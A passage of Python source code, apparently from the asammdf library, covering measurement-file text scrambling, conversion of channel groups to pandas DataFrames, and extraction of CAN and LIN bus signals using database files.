size = UINT64_u(stream.read(8))[0] - 24
texts[addr] = randomized_string(size)
source = cg.acq_source_addr
if source:
source = SourceInformation(
address=source, stream=stream, mapped=False, tx_map={}
)
for addr in (
source.name_addr,
source.path_addr,
source.comment_addr,
):
if addr and addr not in texts:
stream.seek(addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[addr] = randomized_string(size)
for ch in gp.channels:
for addr in (ch.name_addr, ch.unit_addr, ch.comment_addr):
if addr and addr not in texts:
stream.seek(addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[addr] = randomized_string(size)
source = ch.source_addr
if source:
source = SourceInformation(
address=source, stream=stream, mapped=False, tx_map={}
)
for addr in (
source.name_addr,
source.path_addr,
source.comment_addr,
):
if addr and addr not in texts:
stream.seek(addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[addr] = randomized_string(size)
conv = ch.conversion_addr
if conv:
conv = ChannelConversion(
address=conv,
stream=stream,
mapped=False,
tx_map={},
si_map={},
)
for addr in (
conv.name_addr,
conv.unit_addr,
conv.comment_addr,
):
if addr and addr not in texts:
stream.seek(addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[addr] = randomized_string(size)
if conv.conversion_type == v4c.CONVERSION_TYPE_ALG:
addr = conv.formula_addr
if addr and addr not in texts:
stream.seek(addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[addr] = randomized_string(size)
if conv.referenced_blocks:
for key, block in conv.referenced_blocks.items():
if block:
if isinstance(block, bytes):
addr = conv[key]
if addr not in texts:
stream.seek(addr + 8)
size = len(block)
texts[addr] = randomized_string(size)
if callback:
callback(int(idx / count * 66), 100)
except:
print(
f"Error while scrambling the file: {format_exc()}.\nWill now use fallback method"
)
texts = MDF._fallback_scramble_mf4(name)
mdf.close()
dst = name.with_suffix(".scrambled.mf4")
copy(name, dst)
with open(dst, "rb+") as mdf:
count = len(texts)
chunk = max(count // 34, 1)
idx = 0
for index, (addr, bts) in enumerate(texts.items()):
mdf.seek(addr + 24)
mdf.write(bts)
if index % chunk == 0:
if callback:
callback(66 + idx, 100)
if callback:
callback(100, 100)
else:
ChannelConversion = ChannelConversionV3
stream = mdf._file
if mdf.header.comment_addr:
stream.seek(mdf.header.comment_addr + 2)
size = UINT16_u(stream.read(2))[0] - 4
texts[mdf.header.comment_addr + 4] = randomized_string(size)
texts[36 + 0x40] = randomized_string(32)
texts[68 + 0x40] = randomized_string(32)
texts[100 + 0x40] = randomized_string(32)
texts[132 + 0x40] = randomized_string(32)
for idx, gp in enumerate(mdf.groups, 1):
cg = gp.channel_group
addr = cg.comment_addr
if addr and addr not in texts:
stream.seek(addr + 2)
size = UINT16_u(stream.read(2))[0] - 4
texts[addr + 4] = randomized_string(size)
if gp.trigger:
addr = gp.trigger.text_addr
if addr:
stream.seek(addr + 2)
size = UINT16_u(stream.read(2))[0] - 4
texts[addr + 4] = randomized_string(size)
for ch in gp.channels:
for key in ("long_name_addr", "display_name_addr", "comment_addr"):
if hasattr(ch, key):
addr = getattr(ch, key)
else:
addr = 0
if addr and addr not in texts:
stream.seek(addr + 2)
size = UINT16_u(stream.read(2))[0] - 4
texts[addr + 4] = randomized_string(size)
texts[ch.address + 26] = randomized_string(32)
texts[ch.address + 58] = randomized_string(128)
source = ch.source_addr
if source:
source = ChannelExtension(address=source, stream=stream)
if source.type == v23c.SOURCE_ECU:
texts[source.address + 12] = randomized_string(80)
texts[source.address + 92] = randomized_string(32)
else:
texts[source.address + 14] = randomized_string(36)
texts[source.address + 50] = randomized_string(36)
conv = ch.conversion_addr
if conv:
texts[conv + 22] = randomized_string(20)
conv = ChannelConversion(address=conv, stream=stream)
if conv.conversion_type == v23c.CONVERSION_TYPE_FORMULA:
texts[conv + 36] = randomized_string(conv.block_len - 36)
if conv.referenced_blocks:
for key, block in conv.referenced_blocks.items():
if block:
if isinstance(block, bytes):
addr = conv[key]
if addr and addr not in texts:
stream.seek(addr + 2)
size = UINT16_u(stream.read(2))[0] - 4
texts[addr + 4] = randomized_string(size)
if callback:
callback(int(idx / count * 66), 100)
mdf.close()
dst = name.with_suffix(".scrambled.mdf")
copy(name, dst)
with open(dst, "rb+") as mdf:
chunk = count // 34
idx = 0
for index, (addr, bts) in enumerate(texts.items()):
mdf.seek(addr)
mdf.write(bts)
if chunk and index % chunk == 0:
if callback:
callback(66 + idx, 100)
if callback:
callback(100, 100)
return dst
@staticmethod
def _fallback_scramble_mf4(name):
"""scramble text blocks and keep original file structure
Parameters
----------
name : str | pathlib.Path
file name
Returns
-------
name : pathlib.Path
scrambled file name
"""
name = Path(name)
pattern = re.compile(
rb"(?P<block>##(TX|MD))",
re.DOTALL | re.MULTILINE,
)
texts = {}
with open(name, "rb") as stream:
stream.seek(0, 2)
file_limit = stream.tell()
stream.seek(0)
for match in re.finditer(pattern, stream.read()):
start = match.start()
if file_limit - start >= 24:
stream.seek(start + 8)
(size,) = UINT64_u(stream.read(8))
if start + size <= file_limit:
texts[start + 24] = randomized_string(size - 24)
return texts
def get_group(
self,
index,
channels=None,
raster=None,
time_from_zero=True,
empty_channels="skip",
keep_arrays=False,
use_display_names=False,
time_as_date=False,
reduce_memory_usage=False,
raw=False,
ignore_value2text_conversions=False,
only_basenames=False,
):
"""get channel group as pandas DataFrames. If there are multiple
occurrences for the same channel name, then a counter will be used to
make the names unique (<original_name>_<counter>)
Parameters
----------
index : int
channel group index
use_display_names : bool
use display name instead of standard channel name, if available.
reduce_memory_usage : bool
reduce memory usage by converting all float columns to float32 and
searching for minimum dtype that can represent the values found
in integer columns; default *False*
raw (False) : bool
the dataframe will contain the raw channel values
.. versionadded:: 5.7.0
ignore_value2text_conversions (False) : bool
valid only for the channels that have value to text conversions and
if *raw=False*. If this is True then the raw numeric values will be
used, and the conversion will not be applied.
.. versionadded:: 5.8.0
keep_arrays (False) : bool
keep arrays and structure channels as well as the
component channels. If *True* this can be very slow. If *False*
only the component channels are saved, and their names will be
prefixed with the parent channel.
.. versionadded:: 5.8.0
empty_channels ("skip") : str
behaviour for channels without samples; the options are *skip* or
*zeros*; default is *skip*
.. versionadded:: 5.8.0
only_basenames (False) : bool
use just the field names, without prefix, for structures and channel
arrays
.. versionadded:: 5.13.0
raster : float | np.array | str
new raster that can be
* a float step value
* a channel name whose timestamps will be used as raster (starting with asammdf 5.5.0)
* an array (starting with asammdf 5.5.0)
see `resample` for examples of using this argument
Returns
-------
df : pandas.DataFrame
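Examples
--------
A minimal usage sketch; the file name and the group index are hypothetical:
>>> mdf = MDF('measurement.mf4')
>>> df = mdf.get_group(0, use_display_names=True)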
"""
channels = [
(None, gp_index, ch_index)
for gp_index, channel_indexes in self.included_channels(index)[
index
].items()
for ch_index in channel_indexes
]
return self.to_dataframe(
channels=channels,
raster=raster,
time_from_zero=time_from_zero,
empty_channels=empty_channels,
keep_arrays=keep_arrays,
use_display_names=use_display_names,
time_as_date=time_as_date,
reduce_memory_usage=reduce_memory_usage,
raw=raw,
ignore_value2text_conversions=ignore_value2text_conversions,
only_basenames=only_basenames,
)
def iter_to_dataframe(
self,
channels=None,
raster=None,
time_from_zero=True,
empty_channels="skip",
keep_arrays=False,
use_display_names=False,
time_as_date=False,
reduce_memory_usage=False,
raw=False,
ignore_value2text_conversions=False,
use_interpolation=True,
only_basenames=False,
chunk_ram_size=200 * 1024 * 1024,
interpolate_outwards_with_nan=False,
):
"""generator that yields pandas DataFrame's that should not exceed
200MB of RAM
.. versionadded:: 5.15.0
Parameters
----------
channels : list
list of items to be filtered (default None); each item can be :
* a channel name string
* (channel name, group index, channel index) list or tuple
* (channel name, group index) list or tuple
* (None, group index, channel index) list or tuple
raster : float | np.array | str
new raster that can be
* a float step value
* a channel name whose timestamps will be used as raster (starting with asammdf 5.5.0)
* an array (starting with asammdf 5.5.0)
see `resample` for examples of using this argument
time_from_zero : bool
adjust time channel to start from 0; default *True*
empty_channels : str
behaviour for channels without samples; the options are *skip* or
*zeros*; default is *skip*
use_display_names : bool
use display name instead of standard channel name, if available.
keep_arrays : bool
keep arrays and structure channels as well as the
component channels. If *True* this can be very slow. If *False*
only the component channels are saved, and their names will be
prefixed with the parent channel.
time_as_date : bool
the dataframe index will contain the datetime timestamps
according to the measurement start time; default *False*. If
*True* then the argument ``time_from_zero`` will be ignored.
reduce_memory_usage : bool
reduce memory usage by converting all float columns to float32 and
searching for minimum dtype that can represent the values found
in integer columns; default *False*
raw (False) : bool
the columns will contain the raw values
ignore_value2text_conversions (False) : bool
valid only for the channels that have value to text conversions and
if *raw=False*. If this is True then the raw numeric values will be
used, and the conversion will not be applied.
use_interpolation (True) : bool
option to perform interpolations when multiple timestamp rasters are
present. If *False* then dataframe columns will be automatically
filled with NaN's where the dataframe index values are not found in
the current column's timestamps
only_basenames (False) : bool
use just the field names, without prefix, for structures and channel
arrays
interpolate_outwards_with_nan : bool
use NaN values for the samples that lie outside of the original
signal's timestamps
chunk_ram_size : int
desired data frame RAM usage in bytes; default 200 MB
Returns
-------
dataframe : pandas.DataFrame
yields pandas DataFrame's that should not exceed 200MB of RAM
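Examples
--------
A minimal usage sketch; the file name and the per-chunk handling are
hypothetical:
>>> mdf = MDF('measurement.mf4')
>>> for df in mdf.iter_to_dataframe(chunk_ram_size=200 * 1024 * 1024):
...     print(len(df))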
"""
if channels:
mdf = self.filter(channels)
result = mdf.iter_to_dataframe(
raster=raster,
time_from_zero=time_from_zero,
empty_channels=empty_channels,
keep_arrays=keep_arrays,
use_display_names=use_display_names,
time_as_date=time_as_date,
reduce_memory_usage=reduce_memory_usage,
raw=raw,
ignore_value2text_conversions=ignore_value2text_conversions,
use_interpolation=use_interpolation,
only_basenames=only_basenames,
chunk_ram_size=chunk_ram_size,
interpolate_outwards_with_nan=interpolate_outwards_with_nan,
)
for df in result:
yield df
mdf.close()
df = {}
self._set_temporary_master(None)
if raster is not None:
try:
raster = float(raster)
assert raster > 0
except (TypeError, ValueError):
if isinstance(raster, str):
raster = self.get(
raster, raw=True, ignore_invalidation_bits=True
).timestamps
else:
raster = np.array(raster)
else:
raster = master_using_raster(self, raster)
master = raster
else:
masters = {index: self.get_master(index) for index in self.virtual_groups}
if masters:
master = reduce(np.union1d, masters.values())
else:
master = np.array([], dtype="<f4")
master_ = master
channel_count = sum(len(gp.channels) - 1 for gp in self.groups) + 1
# approximation with all float64 dtype
itemsize = channel_count * 8
# use 200MB DataFrame chunks
chunk_count = chunk_ram_size // itemsize or 1
chunks, r = divmod(len(master), chunk_count)
if r:
chunks += 1
for i in range(chunks):
master = master_[chunk_count * i : chunk_count * (i + 1)]
start = master[0]
end = master[-1]
df = {}
self._set_temporary_master(None)
used_names = UniqueDB()
used_names.get_unique_name("timestamps")
groups_nr = len(self.virtual_groups)
for group_index, virtual_group in self.virtual_groups.items():
group_cycles = virtual_group.cycles_nr
if group_cycles == 0 and empty_channels == "skip":
continue
record_offset = max(
np.searchsorted(masters[group_index], start).flatten()[0] - 1, 0
)
stop = np.searchsorted(masters[group_index], end).flatten()[0]
record_count = min(stop - record_offset + 1, group_cycles)
channels = [
(None, gp_index, ch_index)
for gp_index, channel_indexes in self.included_channels(
group_index
)[group_index].items()
for ch_index in channel_indexes
]
signals = [
signal
for signal in self.select(
channels,
raw=True,
copy_master=False,
record_offset=record_offset,
record_count=record_count,
validate=False,
)
]
if not signals:
continue
group_master = signals[0].timestamps
for sig in signals:
if len(sig) == 0:
if empty_channels == "zeros":
sig.samples = np.zeros(
len(master)
if virtual_group.cycles_nr == 0
else virtual_group.cycles_nr,
dtype=sig.samples.dtype,
)
sig.timestamps = (
master if virtual_group.cycles_nr == 0 else group_master
)
if not raw:
if ignore_value2text_conversions:
if self.version < "4.00":
text_conversion = 11
else:
text_conversion = 7
for signal in signals:
conversion = signal.conversion
if (
conversion
and conversion.conversion_type < text_conversion
):
signal.samples = conversion.convert(signal.samples)
else:
for signal in signals:
if signal.conversion:
signal.samples = signal.conversion.convert(
signal.samples
)
for s_index, sig in enumerate(signals):
sig = sig.validate(copy=False)
if len(sig) == 0:
if empty_channels == "zeros":
sig.samples = np.zeros(
len(master)
if virtual_group.cycles_nr == 0
else virtual_group.cycles_nr,
dtype=sig.samples.dtype,
)
sig.timestamps = (
master if virtual_group.cycles_nr == 0 else group_master
)
signals[s_index] = sig
if use_interpolation:
same_master = np.array_equal(master, group_master)
if not same_master and interpolate_outwards_with_nan:
idx = np.argwhere(
(master >= group_master[0]) & (master <= group_master[-1])
).flatten()
cycles = len(group_master)
signals = [
signal.interp(master, self._integer_interpolation)
if not same_master or len(signal) != cycles
else signal
for signal in signals
]
if not same_master and interpolate_outwards_with_nan:
for sig in signals:
sig.timestamps = sig.timestamps[idx]
sig.samples = sig.samples[idx]
group_master = master
signals = [sig for sig in signals if len(sig)]
if signals:
diffs = np.diff(group_master, prepend=-np.inf) > 0
if np.all(diffs):
index = pd.Index(group_master, tupleize_cols=False)
else:
idx = np.argwhere(diffs).flatten()
group_master = group_master[idx]
index = pd.Index(group_master, tupleize_cols=False)
for sig in signals:
sig.samples = sig.samples[idx]
sig.timestamps = sig.timestamps[idx]
size = len(index)
for k, sig in enumerate(signals):
sig_index = (
index
if len(sig) == size
else pd.Index(sig.timestamps, tupleize_cols=False)
)
# byte arrays
if len(sig.samples.shape) > 1:
if use_display_names:
channel_name = sig.display_name or sig.name
else:
channel_name = sig.name
channel_name = used_names.get_unique_name(channel_name)
df[channel_name] = pd.Series(
list(sig.samples),
index=sig_index,
)
# arrays and structures
elif sig.samples.dtype.names:
for name, series in components(
sig.samples,
sig.name,
used_names,
master=sig_index,
only_basenames=only_basenames,
):
df[name] = series
# scalars
else:
if use_display_names:
channel_name = sig.display_name or sig.name
else:
channel_name = sig.name
channel_name = used_names.get_unique_name(channel_name)
if reduce_memory_usage and sig.samples.dtype.kind in "SU":
unique = np.unique(sig.samples)
if len(sig.samples) / len(unique) >= 2:
df[channel_name] = pd.Series(
sig.samples,
index=sig_index,
dtype="category",
)
else:
df[channel_name] = pd.Series(
sig.samples,
index=sig_index,
fastpath=True,
)
else:
if reduce_memory_usage:
sig.samples = downcast(sig.samples)
df[channel_name] = pd.Series(
sig.samples,
index=sig_index,
fastpath=True,
)
if self._callback:
self._callback(group_index + 1, groups_nr)
strings, nonstrings = {}, {}
for col, series in df.items():
if series.dtype.kind == "S":
strings[col] = series
else:
nonstrings[col] = series
df = pd.DataFrame(nonstrings, index=master)
for col, series in strings.items():
df[col] = series
df.index.name = "timestamps"
if time_as_date:
new_index = np.array(df.index) + self.header.start_time.timestamp()
new_index = pd.to_datetime(new_index, unit="s")
df.set_index(new_index, inplace=True)
elif time_from_zero and len(master):
df.set_index(df.index - df.index[0], inplace=True)
yield df
def to_dataframe(
self,
channels=None,
raster=None,
time_from_zero=True,
empty_channels="skip",
keep_arrays=False,
use_display_names=False,
time_as_date=False,
reduce_memory_usage=False,
raw=False,
ignore_value2text_conversions=False,
use_interpolation=True,
only_basenames=False,
interpolate_outwards_with_nan=False,
):
"""generate pandas DataFrame
Parameters
----------
channels : list
list of items to be filtered (default None); each item can be :
* a channel name string
* (channel name, group index, channel index) list or tuple
* (channel name, group index) list or tuple
* (None, group index, channel index) list or tuple
raster : float | np.array | str
new raster that can be
* a float step value
* a channel name whose timestamps will be used as raster (starting with asammdf 5.5.0)
* an array (starting with asammdf 5.5.0)
see `resample` for examples of using this argument
time_from_zero : bool
adjust time channel to start from 0; default *True*
empty_channels : str
behaviour for channels without samples; the options are *skip* or
*zeros*; default is *skip*
use_display_names : bool
use display name instead of standard channel name, if available.
keep_arrays : bool
keep arrays and structure channels as well as the
component channels. If *True* this can be very slow. If *False*
only the component channels are saved, and their names will be
prefixed with the parent channel.
time_as_date : bool
the dataframe index will contain the datetime timestamps
according to the measurement start time; default *False*. If
*True* then the argument ``time_from_zero`` will be ignored.
reduce_memory_usage : bool
reduce memory usage by converting all float columns to float32 and
searching for minimum dtype that can represent the values found
in integer columns; default *False*
raw (False) : bool
the columns will contain the raw values
.. versionadded:: 5.7.0
ignore_value2text_conversions (False) : bool
valid only for the channels that have value to text conversions and
if *raw=False*. If this is True then the raw numeric values will be
used, and the conversion will not be applied.
.. versionadded:: 5.8.0
use_interpolation (True) : bool
option to perform interpolations when multiple timestamp rasters are
present. If *False* then dataframe columns will be automatically
filled with NaN's where the dataframe index values are not found in
the current column's timestamps
.. versionadded:: 5.11.0
only_basenames (False) : bool
use just the field names, without prefix, for structures and channel
arrays
.. versionadded:: 5.13.0
interpolate_outwards_with_nan : bool
use NaN values for the samples that lie outside of the original
signal's timestamps
.. versionadded:: 5.15.0
Returns
-------
dataframe : pandas.DataFrame
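Examples
--------
A minimal usage sketch; the file name and channel names are hypothetical:
>>> mdf = MDF('measurement.mf4')
>>> df = mdf.to_dataframe(channels=['VehicleSpeed'], raster=0.1, time_from_zero=True)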
"""
if channels is not None:
mdf = self.filter(channels)
result = mdf.to_dataframe(
raster=raster,
time_from_zero=time_from_zero,
empty_channels=empty_channels,
keep_arrays=keep_arrays,
use_display_names=use_display_names,
time_as_date=time_as_date,
reduce_memory_usage=reduce_memory_usage,
raw=raw,
ignore_value2text_conversions=ignore_value2text_conversions,
use_interpolation=use_interpolation,
only_basenames=only_basenames,
interpolate_outwards_with_nan=interpolate_outwards_with_nan,
)
mdf.close()
return result
df = {}
self._set_temporary_master(None)
if raster is not None:
try:
raster = float(raster)
assert raster > 0
except (TypeError, ValueError):
if isinstance(raster, str):
raster = self.get(raster).timestamps
else:
raster = np.array(raster)
else:
raster = master_using_raster(self, raster)
master = raster
else:
masters = {index: self.get_master(index) for index in self.virtual_groups}
if masters:
master = reduce(np.union1d, masters.values())
else:
master = np.array([], dtype="<f4")
del masters
idx = np.argwhere(np.diff(master, prepend=-np.inf) > 0).flatten()
master = master[idx]
used_names = UniqueDB()
used_names.get_unique_name("timestamps")
groups_nr = len(self.virtual_groups)
for group_index, (virtual_group_index, virtual_group) in enumerate(
self.virtual_groups.items()
):
if virtual_group.cycles_nr == 0 and empty_channels == "skip":
continue
channels = [
(None, gp_index, ch_index)
for gp_index, channel_indexes in self.included_channels(
virtual_group_index
)[virtual_group_index].items()
for ch_index in channel_indexes
if ch_index != self.masters_db.get(gp_index, None)
]
signals = [
signal
for signal in self.select(
channels, raw=True, copy_master=False, validate=False
)
]
if not signals:
continue
group_master = signals[0].timestamps
for sig in signals:
if len(sig) == 0:
if empty_channels == "zeros":
sig.samples = np.zeros(
len(master)
if virtual_group.cycles_nr == 0
else virtual_group.cycles_nr,
dtype=sig.samples.dtype,
)
sig.timestamps = (
master if virtual_group.cycles_nr == 0 else group_master
)
if not raw:
if ignore_value2text_conversions:
for signal in signals:
conversion = signal.conversion
if conversion:
samples = conversion.convert(signal.samples)
if samples.dtype.kind not in "US":
signal.samples = samples
else:
for signal in signals:
if signal.conversion:
signal.samples = signal.conversion.convert(signal.samples)
for s_index, sig in enumerate(signals):
sig = sig.validate(copy=False)
if len(sig) == 0:
if empty_channels == "zeros":
sig.samples = np.zeros(
len(master)
if virtual_group.cycles_nr == 0
else virtual_group.cycles_nr,
dtype=sig.samples.dtype,
)
sig.timestamps = (
master if virtual_group.cycles_nr == 0 else group_master
)
signals[s_index] = sig
if use_interpolation:
same_master = np.array_equal(master, group_master)
if not same_master and interpolate_outwards_with_nan:
idx = np.argwhere(
(master >= group_master[0]) & (master <= group_master[-1])
).flatten()
cycles = len(group_master)
signals = [
signal.interp(master, self._integer_interpolation)
if not same_master or len(signal) != cycles
else signal
for signal in signals
]
if not same_master and interpolate_outwards_with_nan:
for sig in signals:
sig.timestamps = sig.timestamps[idx]
sig.samples = sig.samples[idx]
group_master = master
signals = [sig for sig in signals if len(sig)]
if signals:
diffs = np.diff(group_master, prepend=-np.inf) > 0
if np.all(diffs):
index = pd.Index(group_master, tupleize_cols=False)
else:
idx = np.argwhere(diffs).flatten()
group_master = group_master[idx]
index = pd.Index(group_master, tupleize_cols=False)
for sig in signals:
sig.samples = sig.samples[idx]
sig.timestamps = sig.timestamps[idx]
size = len(index)
for k, sig in enumerate(signals):
sig_index = (
index
if len(sig) == size
else pd.Index(sig.timestamps, tupleize_cols=False)
)
# byte arrays
if len(sig.samples.shape) > 1:
if use_display_names:
channel_name = sig.display_name or sig.name
else:
channel_name = sig.name
channel_name = used_names.get_unique_name(channel_name)
df[channel_name] = pd.Series(
list(sig.samples),
index=sig_index,
)
# arrays and structures
elif sig.samples.dtype.names:
for name, series in components(
sig.samples,
sig.name,
used_names,
master=sig_index,
only_basenames=only_basenames,
):
df[name] = series
# scalars
else:
if use_display_names:
channel_name = sig.display_name or sig.name
else:
channel_name = sig.name
channel_name = used_names.get_unique_name(channel_name)
if reduce_memory_usage and sig.samples.dtype.kind not in "SU":
sig.samples = downcast(sig.samples)
df[channel_name] = pd.Series(
sig.samples, index=sig_index, fastpath=True
)
if self._callback:
self._callback(group_index + 1, groups_nr)
strings, nonstrings = {}, {}
for col, series in df.items():
if series.dtype.kind == "S":
strings[col] = series
else:
nonstrings[col] = series
df = pd.DataFrame(nonstrings, index=master)
for col, series in strings.items():
df[col] = series
df.index.name = "timestamps"
if time_as_date:
new_index = np.array(df.index) + self.header.start_time.timestamp()
new_index = pd.to_datetime(new_index, unit="s")
df.set_index(new_index, inplace=True)
elif time_from_zero and len(master):
df.set_index(df.index - df.index[0], inplace=True)
return df
def extract_bus_logging(
self,
database_files,
version=None,
ignore_invalid_signals=False,
consolidated_j1939=True,
ignore_value2text_conversion=True,
):
"""extract all possible CAN signal using the provided databases.
Changed in version 6.0.0 from `extract_can_logging`
Parameters
----------
database_files : dict
each key will contain an iterable of database files for that bus type. The
supported bus types are "CAN", "LIN". The iterables will contain the
databases as str, pathlib.Path or canmatrix.CanMatrix objects
.. versionchanged:: 6.0.0 added canmatrix.CanMatrix type
version (None) : str
output file version
ignore_invalid_signals (False) : bool
ignore signals that have all samples equal to their maximum value
.. versionadded:: 5.7.0
consolidated_j1939 (True) : bool
handle PGNs from all the messages as a single instance
.. versionadded:: 5.7.0
ignore_value2text_conversion (True): bool
ignore value to text conversions
.. versionadded:: 5.23.0
Returns
-------
mdf : MDF
new MDF file that contains the successfully extracted signals
Examples
--------
>>> "extrac CAN and LIN bus logging"
>>> mdf = asammdf.MDF(r'bus_logging.mf4')
>>> databases = {
... "CAN": ["file1.dbc", "file2.arxml"],
... "LIN": ["file3.dbc"],
... }
>>> extracted = mdf.extract_bus_logging(database_files=databases)
>>> ...
>>> "extrac just LIN bus logging"
>>> mdf = asammdf.MDF(r'bus_logging.mf4')
>>> databases = {
... "LIN": ["file3.dbc"],
... }
>>> extracted = mdf.extract_bus_logging(database_files=databases)
"""
if version is None:
version = self.version
else:
version = validate_version_argument(version)
out = MDF(
version=version,
encryption_function=self._encryption_function,
decryption_function=self._decryption_function,
callback=self._callback,
)
out.header.start_time = self.header.start_time
if self._callback:
out._callback = out._mdf._callback = self._callback
self.last_call_info = {}
if database_files.get("CAN", None):
out = self._extract_can_logging(
out,
database_files["CAN"],
ignore_invalid_signals,
consolidated_j1939,
ignore_value2text_conversion,
)
if database_files.get("LIN", None):
out = self._extract_lin_logging(
out,
database_files["LIN"],
ignore_invalid_signals,
ignore_value2text_conversion,
)
return out
def _extract_can_logging(
self,
output_file,
dbc_files,
ignore_invalid_signals=False,
consolidated_j1939=True,
ignore_value2text_conversion=True,
):
out = output_file
max_flags = []
valid_dbc_files = []
unique_name = UniqueDB()
for dbc_name in dbc_files:
if isinstance(dbc_name, CanMatrix):
valid_dbc_files.append(
(dbc_name, unique_name.get_unique_name("UserProvidedCanMatrix"))
)
else:
dbc = load_can_database(Path(dbc_name))
if dbc is None:
continue
else:
valid_dbc_files.append((dbc, dbc_name))
count = sum(
1
for group in self.groups
if group.channel_group.flags & v4c.FLAG_CG_BUS_EVENT
and group.channel_group.acq_source.bus_type == v4c.BUS_TYPE_CAN
)
count *= len(valid_dbc_files)
cntr = 0
total_unique_ids = set()
found_ids = defaultdict(set)
not_found_ids = defaultdict(list)
unknown_ids = defaultdict(list)
for dbc, dbc_name in valid_dbc_files:
is_j1939 = dbc.contains_j1939
if is_j1939:
messages = {message.arbitration_id.pgn: message for message in dbc}
else:
messages = {message.arbitration_id.id: message for message in dbc}
current_not_found_ids = {
(msg_id, message.name) for msg_id, message in messages.items()
}
msg_map = {}
for i, group in enumerate(self.groups):
if (
not group.channel_group.flags & v4c.FLAG_CG_BUS_EVENT
or not group.channel_group.acq_source.bus_type == v4c.BUS_TYPE_CAN
or not "CAN_DataFrame" in [ch.name for ch in group.channels]
):
continue
parents, dtypes = self._prepare_record(group)
data = self._load_data(group, optimize_read=False)
for fragment_index, fragment in enumerate(data):
if dtypes.itemsize:
group.record = np.core.records.fromstring(
fragment[0], dtype=dtypes
)
else:
group.record = None
continue
self._set_temporary_master(None)
self._set_temporary_master(self.get_master(i, data=fragment))
bus_ids = self.get(
"CAN_DataFrame.BusChannel",
group=i,
data=fragment,
samples_only=True,
)[0].astype("<u1")
msg_ids = (
self.get("CAN_DataFrame.ID", group=i, data=fragment).astype(
"<u4"
)
& 0x1FFFFFFF
)
original_ids = msg_ids.samples.copy()
if is_j1939:
ps = (msg_ids.samples >> 8) & 0xFF
pf = (msg_ids.samples >> 16) & 0xFF
_pgn = pf << 8
msg_ids.samples = np.where(pf >= 240, _pgn + ps, _pgn)
data_bytes = self.get(
"CAN_DataFrame.DataBytes",
group=i,
data=fragment,
samples_only=True,
)[0]
buses = np.unique(bus_ids)
for bus in buses:
idx = np.argwhere(bus_ids == bus).ravel()
bus_t = msg_ids.timestamps[idx]
bus_msg_ids = msg_ids.samples[idx]
bus_data_bytes = data_bytes[idx]
original_msg_ids = original_ids[idx]
if is_j1939 and not consolidated_j1939:
unique_ids = np.unique(
np.core.records.fromarrays([bus_msg_ids, original_ids])
)
else:
unique_ids = np.unique(
np.core.records.fromarrays([bus_msg_ids, bus_msg_ids])
)
total_unique_ids = total_unique_ids | set(
tuple(int(e) for e in f) for f in unique_ids
)
for msg_id_record in unique_ids:
msg_id = int(msg_id_record[0])
original_msg_id = int(msg_id_record[1])
message = messages.get(msg_id, None)
if message is None:
unknown_ids[msg_id].append(True)
continue
found_ids[dbc_name].add((msg_id, message.name))
try:
current_not_found_ids.remove((msg_id, message.name))
except KeyError:
pass
unknown_ids[msg_id].append(False)
if is_j1939 and not consolidated_j1939:
idx = np.argwhere(
(bus_msg_ids == msg_id)
& (original_msg_ids == original_msg_id)
).ravel()
else:
idx = np.argwhere(bus_msg_ids == msg_id).ravel()
payload = bus_data_bytes[idx]
t = bus_t[idx]
extracted_signals = extract_mux(
payload,
message,
msg_id,
bus,
t,
original_message_id=original_msg_id
if is_j1939 and not consolidated_j1939
else None,
ignore_value2text_conversion=ignore_value2text_conversion,
)
for entry, signals in extracted_signals.items():
if len(next(iter(signals.values()))["samples"]) == 0:
continue
if entry not in msg_map:
sigs = []
index = len(out.groups)
msg_map[entry] = index
for name_, signal in signals.items():
sig = Signal(
samples=signal["samples"],
timestamps=signal["t"],
name=signal["name"],
comment=signal["comment"],
unit=signal["unit"],
invalidation_bits=signal[
"invalidation_bits"
]
if ignore_invalid_signals
else None,
)
sig.comment = f"""\
<CNcomment>
<TX>{sig.comment}</TX>
<names>
<display>
CAN{bus}.{message.name}.{signal['name']}
</display>
</names>
</CNcomment>"""
sigs.append(sig)
cg_nr = out.append(
sigs,
acq_name=f"from CAN{bus} message ID=0x{msg_id:X}",
comment=f"{message} 0x{msg_id:X}",
common_timebase=True,
)
if ignore_invalid_signals:
max_flags.append([False])
for ch_index, sig in enumerate(sigs, 1):
max_flags[cg_nr].append(
np.all(sig.invalidation_bits)
)
else:
index = msg_map[entry]
sigs = []
for name_, signal in signals.items():
sigs.append(
(
signal["samples"],
signal["invalidation_bits"]
if ignore_invalid_signals
else None,
)
)
t = signal["t"]
if ignore_invalid_signals:
for ch_index, sig in enumerate(sigs, 1):
max_flags[index][ch_index] = max_flags[
index
][ch_index] or np.all(sig[1])
sigs.insert(0, (t, None))
out.extend(index, sigs)
self._set_temporary_master(None)
group.record = None
cntr += 1
if self._callback:
self._callback(cntr, count)
if current_not_found_ids:
not_found_ids[dbc_name] = list(current_not_found_ids)
unknown_ids = {
msg_id for msg_id, not_found in unknown_ids.items() if all(not_found)
}
self.last_call_info["CAN"] = {
"dbc_files": dbc_files,
"total_unique_ids": total_unique_ids,
"unknown_id_count": len(unknown_ids),
"not_found_ids": not_found_ids,
"found_ids": found_ids,
"unknown_ids": unknown_ids,
}
if ignore_invalid_signals:
to_keep = []
for i, group in enumerate(out.groups):
for j, channel in enumerate(group.channels[1:], 1):
if not max_flags[i][j]:
to_keep.append((None, i, j))
tmp = out.filter(to_keep, out.version)
out.close()
out = tmp
if self._callback:
self._callback(100, 100)
if not out.groups:
logger.warning(
f'No CAN signals could be extracted from "{self.name}". The '
"output file will be empty."
)
return out
def _extract_lin_logging(
self,
output_file,
dbc_files,
ignore_invalid_signals=False,
ignore_value2text_conversion=True,
):
out = output_file
max_flags = []
valid_dbc_files = []
unique_name = UniqueDB()
for dbc_name in dbc_files:
if isinstance(dbc_name, CanMatrix):
valid_dbc_files.append(
(dbc_name, unique_name.get_unique_name("UserProvidedCanMatrix"))
)
else:
dbc = load_can_database(Path(dbc_name))
if dbc is None:
continue
else:
valid_dbc_files.append((dbc, dbc_name))
count = sum(
1
for group in self.groups
if group.channel_group.flags & v4c.FLAG_CG_BUS_EVENT
and group.channel_group.acq_source.bus_type == v4c.BUS_TYPE_LIN
)
count *= len(valid_dbc_files)
cntr = 0
total_unique_ids = set()
found_ids = defaultdict(set)
not_found_ids = defaultdict(list)
unknown_ids = defaultdict(list)
for dbc, dbc_name in valid_dbc_files:
